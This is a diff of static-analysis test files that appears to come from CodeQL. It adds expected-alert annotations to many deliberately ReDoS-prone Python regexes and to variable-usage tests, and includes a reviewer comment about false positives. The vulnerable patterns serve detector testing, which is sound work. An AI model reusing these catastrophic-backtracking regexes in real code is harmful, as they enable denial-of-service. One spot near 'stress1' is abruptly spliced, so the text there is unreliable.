@@ -124,55 +124,55 @@ bad26 = re.compile(r'''"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"''') # NOT GOOD -bad27 = re.compile(r'''(([a-z]|[d-h])*)"''') +bad27 = re.compile(r'''(([a-z]|[d-h])*)"''') # $ Alert # NOT GOOD -bad27 = re.compile(r'''(([^a-z]|[^0-9])*)"''') +bad27 = re.compile(r'''(([^a-z]|[^0-9])*)"''') # $ Alert # NOT GOOD -bad28 = re.compile(r'''((\d|[0-9])*)"''') +bad28 = re.compile(r'''((\d|[0-9])*)"''') # $ Alert # NOT GOOD -bad29 = re.compile(r'''((\s|\s)*)"''') +bad29 = re.compile(r'''((\s|\s)*)"''') # $ Alert # NOT GOOD -bad30 = re.compile(r'''((\w|G)*)"''') +bad30 = re.compile(r'''((\w|G)*)"''') # $ Alert # GOOD good11 = re.compile(r'''((\s|\d)*)"''') # NOT GOOD -bad31 = re.compile(r'''((\d|\w)*)"''') +bad31 = re.compile(r'''((\d|\w)*)"''') # $ Alert # NOT GOOD -bad32 = re.compile(r'''((\d|5)*)"''') +bad32 = re.compile(r'''((\d|5)*)"''') # $ Alert # NOT GOOD -bad33 = re.compile(r'''((\s|[\f])*)"''') +bad33 = re.compile(r'''((\s|[\f])*)"''') # $ Alert # NOT GOOD -bad34 = re.compile(r'''((\s|[\v]|\\v)*)"''') +bad34 = re.compile(r'''((\s|[\v]|\\v)*)"''') # $ Alert # NOT GOOD -bad35 = re.compile(r'''((\f|[\f])*)"''') +bad35 = re.compile(r'''((\f|[\f])*)"''') # $ Alert # NOT GOOD -bad36 = re.compile(r'''((\W|\D)*)"''') +bad36 = re.compile(r'''((\W|\D)*)"''') # $ Alert # NOT GOOD -bad37 = re.compile(r'''((\S|\w)*)"''') +bad37 = re.compile(r'''((\S|\w)*)"''') # $ Alert # NOT GOOD -bad38 = re.compile(r'''((\S|[\w])*)"''') +bad38 = re.compile(r'''((\S|[\w])*)"''') # $ Alert # NOT GOOD -bad39 = re.compile(r'''((1s|[\da-z])*)"''') +bad39 = re.compile(r'''((1s|[\da-z])*)"''') # $ Alert # NOT GOOD -bad40 = re.compile(r'''((0|[\d])*)"''') +bad40 = re.compile(r'''((0|[\d])*)"''') # $ Alert # NOT GOOD -bad41 = re.compile(r'''(([\d]+)*)"''') +bad41 = re.compile(r'''(([\d]+)*)"''') # $ Alert # GOOD - there is no witness in the end that could cause the regexp to not match good12 = re.compile(r'''(\d+(X\d+)?)+''') 
@@ -184,49 +184,49 @@ good15 = re.compile(r'''^([^>]+)*(>|$)''') # NOT GOOD -bad43 = re.compile(r'''^([^>a]+)*(>|$)''') +bad43 = re.compile(r'''^([^>a]+)*(>|$)''') # $ Alert # NOT GOOD -bad44 = re.compile(r'''(\n\s*)+$''') +bad44 = re.compile(r'''(\n\s*)+$''') # $ Alert # NOT GOOD -bad45 = re.compile(r'''^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})''') +bad45 = re.compile(r'''^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})''') # $ Alert # NOT GOOD -bad46 = re.compile(r'''\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}''') +bad46 = re.compile(r'''\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}''') # $ Alert # NOT GOOD -bad47 = re.compile(r'''(a+|b+|c+)*c''') +bad47 = re.compile(r'''(a+|b+|c+)*c''') # $ Alert # NOT GOOD -bad48 = re.compile(r'''(((a+a?)*)+b+)''') +bad48 = re.compile(r'''(((a+a?)*)+b+)''') # $ Alert # NOT GOOD -bad49 = re.compile(r'''(a+)+bbbb''') +bad49 = re.compile(r'''(a+)+bbbb''') # $ Alert # GOOD good16 = re.compile(r'''(a+)+aaaaa*a+''') # NOT GOOD -bad50 = re.compile(r'''(a+)+aaaaa$''') +bad50 = re.compile(r'''(a+)+aaaaa$''') # $ Alert # GOOD good17 = re.compile(r'''(\n+)+\n\n''') # NOT GOOD -bad51 = re.compile(r'''(\n+)+\n\n$''') +bad51 = re.compile(r'''(\n+)+\n\n$''') # $ Alert # NOT GOOD -bad52 = re.compile(r'''([^X]+)*$''') +bad52 = re.compile(r'''([^X]+)*$''') # $ Alert # NOT GOOD -bad53 = re.compile(r'''(([^X]b)+)*$''') +bad53 = re.compile(r'''(([^X]b)+)*$''') # $ Alert # GOOD good18 = re.compile(r'''(([^X]b)+)*($|[^X]b)''') # NOT GOOD -bad54 = re.compile(r'''(([^X]b)+)*($|[^X]c)''') +bad54 = re.compile(r'''(([^X]b)+)*($|[^X]c)''') # $ Alert # GOOD good20 = re.compile(r'''((ab)+)*ababab''') 
@@ -238,13 +238,13 @@ good22 = re.compile(r'''((ab)+)*''') # NOT GOOD -bad55 = re.compile(r'''((ab)+)*$''') +bad55 = re.compile(r'''((ab)+)*$''') # $ Alert # GOOD good23 = re.compile(r'''((ab)+)*[a1][b1][a2][b2][a3][b3]''') # NOT GOOD -bad56 = re.compile(r'''([\n\s]+)*(.)''') +bad56 = re.compile(r'''([\n\s]+)*(.)''') # $ Alert # GOOD - any witness passes through the accept state. good24 = re.compile(r'''(A*A*X)*''') 
@@ -253,76 +253,76 @@ good26 = re.compile(r'''([^\\\]]+)*''') # NOT GOOD -bad59 = re.compile(r'''(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-''') +bad59 = re.compile(r'''(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-''') # $ Alert # NOT GOOD -bad60 = re.compile(r'''(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-''') +bad60 = re.compile(r'''(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-''') # $ Alert # NOT GOOD -bad61 = re.compile(r'''(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-''') +bad61 = re.compile(r'''(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-''') # $ Alert # GOOD good27 = re.compile(r'''(thisisagoddamnlongstringforstresstestingthequery|imanotherbutunrelatedstringcomparedtotheotherstring)*-''') # GOOD (but false positive caused by the extractor converting all four unpaired surrogates to \uFFFD) -good28 = re.compile('''foo([\uDC66\uDC67]|[\uDC68\uDC69])*foo''') +good28 = re.compile('''foo([\uDC66\uDC67]|[\uDC68\uDC69])*foo''') # $ Alert # GOOD (but false positive caused by the extractor converting all four unpaired surrogates to \uFFFD) -good29 = re.compile('''foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo''') +good29 = re.compile('''foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo''') # $ Alert # NOT GOOD (but cannot currently construct a prefix) -bad62 = re.compile(r'''a{2,3}(b+)+X''') +bad62 = re.compile(r'''a{2,3}(b+)+X''') # $ Alert # NOT GOOD (and a good prefix test) -bad63 = re.compile(r'''^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>''') +bad63 = re.compile(r'''^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>''') # $ Alert # GOOD good30 = re.compile(r'''(a+)*[\s\S][\s\S][\s\S]?''') # GOOD - but we fail to see that repeating the attack string ends in the "accept any" state (due to not 
parsing the range `[\s\S]{2,3}`). -good31 = re.compile(r'''(a+)*[\s\S]{2,3}''') +good31 = re.compile(r'''(a+)*[\s\S]{2,3}''') # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists (due to not parsing the range `[\s\S]{2,}` when constructing the NFA). -good32 = re.compile(r'''(a+)*([\s\S]{2,}|X)$''') +good32 = re.compile(r'''(a+)*([\s\S]{2,}|X)$''') # $ Alert # GOOD good33 = re.compile(r'''(a+)*([\s\S]*|X)$''') # NOT GOOD -bad64 = re.compile(r'''((a+)*$|[\s\S]+)''') +bad64 = re.compile(r'''((a+)*$|[\s\S]+)''') # $ Alert # GOOD - but still flagged. The only change compared to the above is the order of alternatives, which we don't model. -good34 = re.compile(r'''([\s\S]+|(a+)*$)''') +good34 = re.compile(r'''([\s\S]+|(a+)*$)''') # $ Alert # GOOD good35 = re.compile(r'''((;|^)a+)+$''') # NOT GOOD (a good prefix test) -bad65 = re.compile(r'''(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f''') +bad65 = re.compile(r'''(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f''') # $ Alert # NOT GOOD -bad66 = re.compile(r'''^ab(c+)+$''') +bad66 = re.compile(r'''^ab(c+)+$''') # $ Alert # NOT GOOD -bad67 = re.compile(r'''(\d(\s+)*){20}''') +bad67 = re.compile(r'''(\d(\s+)*){20}''') # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists. -good36 = re.compile(r'''(([^/]|X)+)(\/[\s\S]*)*$''') +good36 = re.compile(r'''(([^/]|X)+)(\/[\s\S]*)*$''') # $ Alert # GOOD - but we spuriously conclude that a rejecting suffix exists. 
-good37 = re.compile(r'''^((x([^Y]+)?)*(Y|$))''') +good37 = re.compile(r'''^((x([^Y]+)?)*(Y|$))''') # $ Alert # NOT GOOD -bad68 = re.compile(r'''(a*)+b''') +bad68 = re.compile(r'''(a*)+b''') # $ Alert # NOT GOOD -bad69 = re.compile(r'''foo([\w-]*)+bar''') +bad69 = re.compile(r'''foo([\w-]*)+bar''') # $ Alert # NOT GOOD -bad70 = re.compile(r'''((ab)*)+c''') +bad70 = re.compile(r'''((ab)*)+c''') # $ Alert # NOT GOOD -bad71 = re.compile(r'''(a?a?)*b''') +bad71 = re.compile(r'''(a?a?)*b''') # $ Alert # GOOD good38 = re.compile(r'''(a?)*b''') 
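Review bot: The patterns commented `# GOOD` in this hunk (`good28`, `good29`, `good31`, `good32`, `good34`, `good36` and `good37`) are annotated with a plain `# $ Alert`, which reads as if the ReDoS report were the intended result. Their own comments describe them as false positives (unpaired surrogates converted to \uFFFD, unparsed `{2,3}` and `{2,}` ranges, a spurious rejecting suffix, unmodelled order of alternatives), so the expectation should say so: `good31 = re.compile(r'''(a+)*[\s\S]{2,3}''') # $ SPURIOUS: Alert`, and likewise for the other six. That keeps known analysis imprecision distinguishable from true positives when someone triages this test file or tunes the query.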
@@ -331,44 +331,44 @@ bad72 = re.compile(r'''(c?a?)*b''') # NOT GOOD -bad73 = re.compile(r'''(?:a|a?)+b''') +bad73 = re.compile(r'''(?:a|a?)+b''') # $ Alert # NOT GOOD - but not detected. bad74 = re.compile(r'''(a?b?)*$''') # NOT GOOD -bad76 = re.compile(r'''PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)''') +bad76 = re.compile(r'''PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)''') # $ Alert # NOT GOOD - but not detected -bad77 = re.compile(r'''^((a)+\w)+$''') +bad77 = re.compile(r'''^((a)+\w)+$''') # $ Alert # NOT GOOD -bad78 = re.compile(r'''^(b+.)+$''') +bad78 = re.compile(r'''^(b+.)+$''') # $ Alert # GOOD good39 = re.compile(r'''a*b''') # All 4 bad combinations of nested * and + -bad79 = re.compile(r'''(a*)*b''') -bad80 = re.compile(r'''(a+)*b''') -bad81 = re.compile(r'''(a*)+b''') -bad82 = re.compile(r'''(a+)+b''') +bad79 = re.compile(r'''(a*)*b''') # $ Alert +bad80 = re.compile(r'''(a+)*b''') # $ Alert +bad81 = re.compile(r'''(a*)+b''') # $ Alert +bad82 = re.compile(r'''(a+)+b''') # $ Alert # GOOD good40 = re.compile(r'''(a|b)+''') good41 = re.compile(r'''(?:[\s;,"'<>(){}|[\]@=+*]|:(?![/\\]))+''') # parses wrongly, sees column 42 as a char set start # NOT GOOD -bad83 = re.compile(r'''^((?:a{|-)|\w\{)+X$''') -bad84 = re.compile(r'''^((?:a{0|-)|\w\{\d)+X$''') -bad85 = re.compile(r'''^((?:a{0,|-)|\w\{\d,)+X$''') -bad86 = re.compile(r'''^((?:a{0,2|-)|\w\{\d,\d)+X$''') +bad83 = re.compile(r'''^((?:a{|-)|\w\{)+X$''') # $ Alert +bad84 = re.compile(r'''^((?:a{0|-)|\w\{\d)+X$''') # $ Alert +bad85 = re.compile(r'''^((?:a{0,|-)|\w\{\d,)+X$''') # $ Alert +bad86 = re.compile(r'''^((?:a{0,2|-)|\w\{\d,\d)+X$''') # $ Alert # GOOD: good42 = re.compile(r'''^((?:a{0,2}|-)|\w\{\d,\d\})+X$''') # NOT GOOD -bad87 = re.compile(r'X(\u0061|a)*Y') +bad87 = re.compile(r'X(\u0061|a)*Y') # $ Alert # GOOD good43 = re.compile(r'X(\u0061|b)+Y') 
@@ -377,17 +377,17 @@ good44 = re.compile(r'("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)') # BAD -bad88 = re.compile(r'/("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X') -bad89 = re.compile(r'/("[^"]*?"|[^"\s]+)+(?=X)') +bad88 = re.compile(r'/("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X') # $ Alert +bad89 = re.compile(r'/("[^"]*?"|[^"\s]+)+(?=X)') # $ Alert # BAD -bad90 = re.compile(r'\A(\d|0)*x') -bad91 = re.compile(r'(\d|0)*\Z') -bad92 = re.compile(r'\b(\d|0)*x') +bad90 = re.compile(r'\A(\d|0)*x') # $ Alert +bad91 = re.compile(r'(\d|0)*\Z') # $ Alert +bad92 = re.compile(r'\b(\d|0)*x') # $ Alert # GOOD stress1 = re.compile(r"(? 2) - self.assertTrue(1 in [1]) - self.assertFalse(0 is "") + self.assertTrue(1 == 1) # $ Alert + self.assertFalse(1 > 2) # $ Alert + self.assertTrue(1 in [1]) # $ Alert + self.assertFalse(0 is "") # $ Alert diff --git a/python/ql/test/query-tests/Variables/general/Global.qlref b/python/ql/test/query-tests/Variables/general/Global.qlref index c20333a006e4..9b2b8470e10d 100644 --- a/python/ql/test/query-tests/Variables/general/Global.qlref +++ b/python/ql/test/query-tests/Variables/general/Global.qlref @@ -1 +1,2 @@ -Variables/Global.ql \ No newline at end of file +query: Variables/Global.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/general/GlobalAtModuleLevel.qlref b/python/ql/test/query-tests/Variables/general/GlobalAtModuleLevel.qlref index f12469499b74..9c4da1043fd1 100644 --- a/python/ql/test/query-tests/Variables/general/GlobalAtModuleLevel.qlref +++ b/python/ql/test/query-tests/Variables/general/GlobalAtModuleLevel.qlref @@ -1 +1,2 @@ -Variables/GlobalAtModuleLevel.ql \ No newline at end of file +query: Variables/GlobalAtModuleLevel.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/general/ShadowBuiltin.qlref b/python/ql/test/query-tests/Variables/general/ShadowBuiltin.qlref index d732a539e5ff..83d2543e7470 100644 
--- a/python/ql/test/query-tests/Variables/general/ShadowBuiltin.qlref +++ b/python/ql/test/query-tests/Variables/general/ShadowBuiltin.qlref @@ -1 +1,2 @@ -Variables/ShadowBuiltin.ql +query: Variables/ShadowBuiltin.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/general/ShadowGlobal.qlref b/python/ql/test/query-tests/Variables/general/ShadowGlobal.qlref index d3d632da035a..a7e7b3c4bad6 100644 --- a/python/ql/test/query-tests/Variables/general/ShadowGlobal.qlref +++ b/python/ql/test/query-tests/Variables/general/ShadowGlobal.qlref @@ -1 +1,2 @@ -Variables/ShadowGlobal.ql +query: Variables/ShadowGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/general/variables_test.py b/python/ql/test/query-tests/Variables/general/variables_test.py index e623ee5244d6..8f11b9180c3b 100644 --- a/python/ql/test/query-tests/Variables/general/variables_test.py +++ b/python/ql/test/query-tests/Variables/general/variables_test.py @@ -4,14 +4,14 @@ #Shadow Builtin def sh1(x): - len = x + 2 #Shadows + len = x + 2 #Shadows # $ Alert[py/local-shadows-builtin] len = x + 0 # no shadowing warning for 2nd def return len #Shadow Global def sh2(x): - sh1 = x + 1 #Shadows + sh1 = x + 1 #Shadows # $ Alert[py/local-shadows-global] sh1 = x + 0 # no shadowing warning for 2nd def return sh1 @@ -54,14 +54,14 @@ def func(): return is_used_var2 #Redundant global declaration -global g_x +global g_x # $ Alert[py/redundant-global-declaration] g_x = 0 #Use global def uses_global(arg): - global g_x + global g_x # $ Alert[py/use-of-global] g_x = arg use(g_x) diff --git a/python/ql/test/query-tests/Variables/multiple/MultiplyDefined.qlref b/python/ql/test/query-tests/Variables/multiple/MultiplyDefined.qlref index 293098be566b..406acf779df9 100644 --- a/python/ql/test/query-tests/Variables/multiple/MultiplyDefined.qlref 
+++ b/python/ql/test/query-tests/Variables/multiple/MultiplyDefined.qlref @@ -1 +1,2 @@ -Variables/MultiplyDefined.ql +query: Variables/MultiplyDefined.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/multiple/uselesscode_test.py b/python/ql/test/query-tests/Variables/multiple/uselesscode_test.py index 49f367d6db3e..fb3395d5806d 100644 --- a/python/ql/test/query-tests/Variables/multiple/uselesscode_test.py +++ b/python/ql/test/query-tests/Variables/multiple/uselesscode_test.py @@ -1,8 +1,8 @@ #Multiple declarations -def mult(a): - x = 1 +def mult(a): # $ Alert + x = 1 # $ Alert y = a x = 2 #Need to use x, otherwise it is ignored @@ -25,7 +25,7 @@ def _double_loop(seq): for i in seq: pass -class Mult(object): +class Mult(object): # $ Alert pass @@ -49,7 +49,7 @@ def isStr(s): # 'bad' actually *is* always redefined before being read. def have_nosmp(): try: - bad = os.environ['NPY_NOSMP'] + bad = os.environ['NPY_NOSMP'] # $ Alert bad = 1 except KeyError: bad = 0 @@ -64,7 +64,7 @@ def simple_try(foo): def try_with_else(foo): try: - bad = foo.bar + bad = foo.bar # $ Alert except AttributeError: raise else: @@ -114,7 +114,7 @@ def odasa4166(cond): def odasa5315(): x, y = foo() # OK as y is used use(y) - x, y = bar() # Not OK as neither x nor y are used. + x, y = bar() # Not OK as neither x nor y are used. # $ Alert x, y = baz() # OK as both used return x + y diff --git a/python/ql/test/query-tests/Variables/undefined/UndefinedExport.qlref b/python/ql/test/query-tests/Variables/undefined/UndefinedExport.qlref index 3e5d31e47488..d964148077e5 100644 --- a/python/ql/test/query-tests/Variables/undefined/UndefinedExport.qlref +++ b/python/ql/test/query-tests/Variables/undefined/UndefinedExport.qlref @@ -1 +1,2 @@ -Variables/UndefinedExport.ql +query: Variables/UndefinedExport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.py b/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.py index 0438d8e84b3c..0962a97ccfe2 100644 --- a/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.py +++ b/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.py @@ -19,12 +19,12 @@ def f(parameter): helper # Explicitly as import a # Imlicitly from ud_helper defined - ug2 # ERROR - e # ERROR Defined in ud_helper, but not in __all__ + ug2 # ERROR # $ Alert[py/undefined-global-variable] + e # ERROR Defined in ud_helper, but not in __all__ # $ Alert[py/undefined-global-variable] int float __file__ #OK all files have __file__ defined - __path__ #ERROR only modules have __path__ defined + __path__ #ERROR only modules have __path__ defined # $ Alert[py/undefined-global-variable] len #Ok defined in builtins monkey1 #Ok monkey-patched builtins @@ -120,7 +120,7 @@ def inner(): pfp3 += 1 def only_report_once(): - ug3 + ug3 # $ Alert[py/undefined-global-variable] ug3 ug3 ug3 diff --git a/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.qlref b/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.qlref index ea9f5a038426..e69631e746b9 100644 --- a/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.qlref +++ b/python/ql/test/query-tests/Variables/undefined/UndefinedGlobal.qlref @@ -1 +1,2 @@ -Variables/UndefinedGlobal.ql +query: Variables/UndefinedGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.py b/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.py index 26e109af5a2a..24a09f1be336 100644 --- a/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.py +++ b/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.py @@ -2,7 +2,7 @@ class C: def m1(self): - y = ug1 + y = ug1 # $ Alert[py/undefined-global-variable] x = 1 return y 
@@ -10,16 +10,16 @@ def m2(self, p): return p def m3(self, x1): - return u2 + return u2 # $ Alert[py/uninitialized-local-variable] u2 = x1 def m4(self, x2): if x2: u3 = 1 - return u3 + return u3 # $ Alert[py/uninitialized-local-variable] def f(): - y = ug1 + y = ug1 # $ Alert[py/undefined-global-variable] x = 1 return y @@ -34,7 +34,7 @@ def h(): def j(u4): del u4 - return u4 + return u4 # $ Alert[py/uninitialized-local-variable] def k(x5): x5 + 1 @@ -43,7 +43,7 @@ def k(x5): def m(x6): if x6: u6 = 1 - u6 + u6 # $ Alert[py/uninitialized-local-variable] #The following are not uninitialized, but unreachable. u6 u6 @@ -66,13 +66,13 @@ def check_del(cond): del u8 else: pass - u8 + u8 # $ Alert[py/uninitialized-local-variable] if cond: u9 = 1 del u9 else: u9 = 2 - u9 + u9 # $ Alert[py/uninitialized-local-variable] if cond: x10 = 1 del x10 @@ -82,10 +82,10 @@ def check_del(cond): x10 u11 = 1 del u11 - u11 + u11 # $ Alert[py/uninitialized-local-variable] u12 = "hi" del u12 - del u12 + del u12 # $ Alert[py/uninitialized-local-variable] #x will always be defined. def const_range(): @@ -116,7 +116,7 @@ def use_def_conditional(cond4, cond5): u14 = 1 x16 = 2 if cond5: - return u14 + return u14 # $ Alert[py/uninitialized-local-variable] def init_and_set_flag_in_try(f): @@ -148,7 +148,7 @@ def split_not_OK(): except: cond = not False if not not cond: - return u19 + return u19 # $ Alert[py/uninitialized-local-variable] def double_is_none(x): if x is not None: @@ -160,7 +160,7 @@ def double_is_none(x): #ODASA-4241 def def_in_post_loop(seq): - j(x) + j(x) # $ Alert[py/uninitialized-local-variable] x = [] for p in seq: x = p @@ -173,9 +173,9 @@ def f(cond1, cond2): else: y = 1 if cond2: - return x + return x # $ Alert[py/uninitialized-local-variable] else: - return y + return y # $ Alert[py/uninitialized-local-variable] def needs_splitting(var): if var: 
diff --git a/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.qlref b/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.qlref index f2d0e603554a..90233ce61888 100644 --- a/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.qlref +++ b/python/ql/test/query-tests/Variables/undefined/UninitializedLocal.qlref @@ -1 +1,2 @@ -Variables/UninitializedLocal.ql +query: Variables/UninitializedLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/undefined/decorated_exports.py b/python/ql/test/query-tests/Variables/undefined/decorated_exports.py index aad8e347909b..137807a0e004 100644 --- a/python/ql/test/query-tests/Variables/undefined/decorated_exports.py +++ b/python/ql/test/query-tests/Variables/undefined/decorated_exports.py @@ -1,16 +1,16 @@ import dotted -__all__ = ["foo", "bar", "baz", "not_defined"] +__all__ = ["foo", "bar", "baz", "not_defined"] # $ Alert[py/undefined-export] @dotted.decorator def foo(): pass -@undotted_decorator +@undotted_decorator # $ Alert[py/undefined-global-variable] def bar(): pass -@not_imported.but_dotted +@not_imported.but_dotted # $ Alert[py/undefined-global-variable] def baz(): pass diff --git a/python/ql/test/query-tests/Variables/undefined/exports.py b/python/ql/test/query-tests/Variables/undefined/exports.py index b12a501710c7..cb59cc6958d2 100644 --- a/python/ql/test/query-tests/Variables/undefined/exports.py +++ b/python/ql/test/query-tests/Variables/undefined/exports.py @@ -1,4 +1,4 @@ -__all__ = ["foo", "bar", "baz", "quux", "blat", "frob", "nosuch", "i_got_it_elsewhere"] +__all__ = ["foo", "bar", "baz", "quux", "blat", "frob", "nosuch", "i_got_it_elsewhere"] # $ Alert[py/undefined-export] with open("foo.txt") as f: foo = f.read() diff --git a/python/ql/test/query-tests/Variables/undefined/odasa3987.py b/python/ql/test/query-tests/Variables/undefined/odasa3987.py index 9c3a5fa5b2f3..43444bb80cdb 100644 
--- a/python/ql/test/query-tests/Variables/undefined/odasa3987.py +++ b/python/ql/test/query-tests/Variables/undefined/odasa3987.py @@ -8,7 +8,7 @@ def f(cond1, cond2): except Exception: if cond2: var = 7 - if var == 1: + if var == 1: # $ Alert[py/uninitialized-local-variable] var = var + 1 elif var == 2: var +- 3 diff --git a/python/ql/test/query-tests/Variables/unused/SuspiciousUnusedLoopIterationVariable.qlref b/python/ql/test/query-tests/Variables/unused/SuspiciousUnusedLoopIterationVariable.qlref index 4b9f136451eb..4931ceb29e85 100644 --- a/python/ql/test/query-tests/Variables/unused/SuspiciousUnusedLoopIterationVariable.qlref +++ b/python/ql/test/query-tests/Variables/unused/SuspiciousUnusedLoopIterationVariable.qlref @@ -1 +1,2 @@ -Variables/SuspiciousUnusedLoopIterationVariable.ql \ No newline at end of file +query: Variables/SuspiciousUnusedLoopIterationVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/unused/UnusedLocalVariable.qlref b/python/ql/test/query-tests/Variables/unused/UnusedLocalVariable.qlref index bd6e5aaa069d..122b9d6456f6 100644 --- a/python/ql/test/query-tests/Variables/unused/UnusedLocalVariable.qlref +++ b/python/ql/test/query-tests/Variables/unused/UnusedLocalVariable.qlref @@ -1 +1,2 @@ -Variables/UnusedLocalVariable.ql +query: Variables/UnusedLocalVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/unused/UnusedModuleVariable.qlref b/python/ql/test/query-tests/Variables/unused/UnusedModuleVariable.qlref index 587ad9510764..8709d1bd6045 100644 --- a/python/ql/test/query-tests/Variables/unused/UnusedModuleVariable.qlref +++ b/python/ql/test/query-tests/Variables/unused/UnusedModuleVariable.qlref @@ -1 +1,2 @@ -Variables/UnusedModuleVariable.ql \ No newline at end of file +query: Variables/UnusedModuleVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Variables/unused/UnusedParameter.qlref b/python/ql/test/query-tests/Variables/unused/UnusedParameter.qlref index b37e4859c1b0..1ab2f09ae4ff 100644 --- a/python/ql/test/query-tests/Variables/unused/UnusedParameter.qlref +++ b/python/ql/test/query-tests/Variables/unused/UnusedParameter.qlref @@ -1 +1,2 @@ -Variables/UnusedParameter.ql +query: Variables/UnusedParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Variables/unused/test.py b/python/ql/test/query-tests/Variables/unused/test.py index 18dd2020306e..2159bf86b6e5 100644 --- a/python/ql/test/query-tests/Variables/unused/test.py +++ b/python/ql/test/query-tests/Variables/unused/test.py @@ -1,7 +1,7 @@ #Unused def fail(): - for t in [TypeA, TypeB]: + for t in [TypeA, TypeB]: # $ Alert[py/unused-loop-variable] x = TypeA() run_test(x) @@ -63,19 +63,19 @@ def OK8(seq, output): #Not OK -- Use a constant, but also a variable def fail2(sequence): for x in sequence: - for y in sequence: + for y in sequence: # $ Alert[py/unused-loop-variable] do_something(x+1) def fail3(sequence): for x in sequence: do_something(x+1) - for y in sequence: + for y in sequence: # $ Alert[py/unused-loop-variable] do_something(x+1) def fail4(coll, sequence): while coll: x = coll.pop() - for s in sequence: + for s in sequence: # $ Alert[py/unused-loop-variable] do_something(x+1) #OK See ODASA-4153 and ODASA-4533 @@ -103,7 +103,7 @@ def kwargs_is_a_use(seq): #A deletion is a use, but this is almost certainly an error def cleanup(sessions): - for sess in sessions: + for sess in sessions: # $ Alert[py/unused-loop-variable] # Original code had some comment about deleting sessions del sess diff --git a/python/ql/test/query-tests/Variables/unused/variables_test.py b/python/ql/test/query-tests/Variables/unused/variables_test.py index 611b9fbd6b2a..18be092a952e 100644 --- a/python/ql/test/query-tests/Variables/unused/variables_test.py 
+++ b/python/ql/test/query-tests/Variables/unused/variables_test.py @@ -22,11 +22,11 @@ #Unused parameter, local and global -def u1(x): +def u1(x): # $ Alert[py/unused-parameter] return 0 def u2(): - x = 1 + x = 1 # $ Alert[py/unused-local-variable] return 1 #These parameters are OK due to (potential overriding) @@ -45,8 +45,8 @@ def ok3(self, arg): pass #Unused module variable -not_used_var1 = 17 -not_used_var2 = 18 +not_used_var1 = 17 # $ Alert[py/unused-global-variable] +not_used_var2 = 18 # $ Alert[py/unused-global-variable] is_used_var1 = 19 is_used_var2 = 20 @@ -83,21 +83,21 @@ def f(t): # Entirely unused tuple -a,b,c = t +a,b,c = t # $ Alert[py/unused-global-variable] def f(t): - a,b,c = t + a,b,c = t # $ Alert[py/unused-local-variable] use(t) def second_def_undefined(): var = 0 use(var) - var = 1 # unused. + var = 1 # unused. # $ Alert[py/unused-local-variable] #And gloablly glob_var = 0 use(glob_var) -glob_var = 1 # unused +glob_var = 1 # unused 